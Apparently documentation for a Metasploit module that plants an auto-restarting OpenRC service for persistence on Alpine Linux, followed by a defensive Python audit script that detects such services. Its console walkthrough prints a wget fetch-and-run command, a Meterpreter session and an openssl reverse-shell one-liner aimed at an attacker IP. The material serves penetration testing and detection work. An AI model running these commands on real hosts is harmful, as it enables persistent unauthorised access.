## Vulnerable Application

This module will create a service on the box via OpenRC, and mark it for auto-restart.
We need enough access to write service files and potentially restart services.

Verified against Alpine 3.21.2.

## Verification Steps

1. Exploit a box and get a **root** session
2. `use exploit/linux/persistence/init_openrc`
3. `set SESSION `
4. `set PAYLOAD `
5. `set LHOST `
6. `exploit`

## Options

### WritableDir

Remote writable directory to store the payload. Avoid using `/tmp` as it will be deleted upon reboot.

### SERVICE

The name of the service to create. If not chosen, a random one is created.

### PAYLOAD_NAME

The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created.

## Scenarios

### Alpine Linux 3.21.2

Of note, the default install of Alpine doesn't have `curl` or `bash`. The `OpenSSL` payload was confirmed working, though.

Initial access vector via web delivery:

```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO xK7yCqmS --no-check-certificate http://111.111.1.111:8181/l; chmod +x xK7yCqmS; ./xK7yCqmS& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:33954) at 2025-02-09 09:31:16 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

(Meterpreter 1)(/root) > getuid
Server username: root
(Meterpreter 1)(/root) > sysinfo
Computer     : alpine3.21.2
OS           : (Linux 6.12.12-0-virt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/root) > background
[*] Backgrounding session 1...
```

Persistence:

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_openrc
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set payload payload/cmd/unix/reverse_openssl
payload => cmd/unix/reverse_openssl
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > exploit
[+] sh -c '(sleep 4296|openssl s_client -quiet -connect 111.111.1.111:4444|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 111.111.1.111:4444 >/dev/null 2>&1 &)'
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_openrc) > [*] Started reverse double SSL handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /tmp/ is writable and openrc based
[*] Writing backdoor to /tmp//rljkrbglMY
[*] Writing service: /etc/init.d/GpdAgZVBGWq
[*] Writing '/etc/init.d/GpdAgZVBGWq' (141 bytes) ...
[*] Enabling service
[+] Starting service
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/alpine3.21.2_20250209.3159/alpine3.21.2_20250209.3159.rc
[*] Command: echo duVbKHsRwQ5D05J7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "duVbKHsRwQ5D05J7\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (111.111.1.111:4444 -> 222.222.2.222:43560) at 2025-02-09 09:32:07 -0500
```
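As an added defender-side example (not part of the module or its documentation), a Python audit that hunts for the artifacts the run above leaves behind: an `/etc/init.d` script linked into a runlevel whose `command=` points into a volatile directory such as the `/tmp` WritableDir, or at a file containing an `openssl s_client` reverse-shell stub. It assumes a plain `etc/init.d` plus `etc/runlevels/<level>/<svc>` layout; the sample tree it builds reuses the service and payload names from the walkthrough as constructed data.

```python
import os
import re
import tempfile

# Indicators from the walkthrough: a command in a volatile dir (the /tmp WritableDir) or an openssl reverse shell.
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SUSPECT = re.compile(r"openssl\s+s_client|while\s*:\s*;\s*do\s+sh\b|/dev/tcp/")

def enabled_runlevels(root):
    """Map service name -> runlevels it is linked into (etc/runlevels/<level>/<svc>)."""
    levels, rl = {}, os.path.join(root, "etc", "runlevels")
    for level in (os.listdir(rl) if os.path.isdir(rl) else []):
        for svc in os.listdir(os.path.join(rl, level)):
            levels.setdefault(svc, []).append(level)
    return levels

def audit_openrc(root="/"):
    """Return {service: [reasons]} for init scripts that look like dropped persistence."""
    findings, levels = {}, enabled_runlevels(root)
    initd = os.path.join(root, "etc", "init.d")
    for name in sorted(os.listdir(initd)):
        path = os.path.join(initd, name)
        if not os.path.isfile(path):
            continue
        with open(path, errors="replace") as fh:
            script = fh.read()
        reasons = []
        # openrc-run scripts set command=<path>; the module points it at WritableDir.
        for m in re.finditer(r"^\s*command=[\"']?([^\"'\s]+)", script, re.M):
            cmd = m.group(1)
            if cmd.startswith(VOLATILE_DIRS):
                reasons.append(f"command in volatile dir: {cmd}")
            target = os.path.join(root, cmd.lstrip("/"))
            if os.path.isfile(target) and SUSPECT.search(open(target, errors="replace").read()):
                reasons.append(f"reverse-shell pattern in {cmd}")
        if reasons:
            findings[name] = reasons + ["enabled in: " + ",".join(levels.get(name, []))]
    return findings

def build_sample_tree():
    """Constructed fake root mirroring the walkthrough above (sample data, not a live host)."""
    root = tempfile.mkdtemp()
    for d in ("etc/init.d", "etc/runlevels/default", "tmp"):
        os.makedirs(os.path.join(root, d))
    write = lambda rel, body: open(os.path.join(root, rel), "w").write(body)
    write("etc/init.d/sshd", "#!/sbin/openrc-run\ncommand=/usr/sbin/sshd\n")
    write("etc/init.d/GpdAgZVBGWq", "#!/sbin/openrc-run\ncommand=/tmp//rljkrbglMY\ncommand_background=true\n")
    write("tmp/rljkrbglMY", "#!/bin/sh\nopenssl s_client -quiet -connect 111.111.1.111:4444\n")
    os.symlink("../../init.d/GpdAgZVBGWq", os.path.join(root, "etc/runlevels/default/GpdAgZVBGWq"))  # what rc-update add creates
    return root
```

Run `audit_openrc("/")` as root on a live Alpine host; a service that survives a reboot only because of an enabled init script in a volatile directory is exactly the pattern worth pulling the cleanup RC file for.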